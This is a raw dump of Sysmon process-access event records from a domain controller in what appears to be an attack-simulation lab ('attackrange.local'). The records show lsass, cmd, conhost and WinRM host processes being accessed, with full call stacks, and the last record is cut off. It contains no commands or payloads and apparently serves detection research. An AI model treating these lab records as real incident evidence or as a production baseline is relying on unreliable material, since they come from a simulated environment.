10341000x80000000000000006625Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006624Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006623Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006622Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006621Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006620Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006619Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006618Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006617Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006616Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006615Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006614Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006613Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006612Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006611Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006610Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006609Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006608Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006607Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006606Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006605Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006604Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006603Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006602Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006601Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 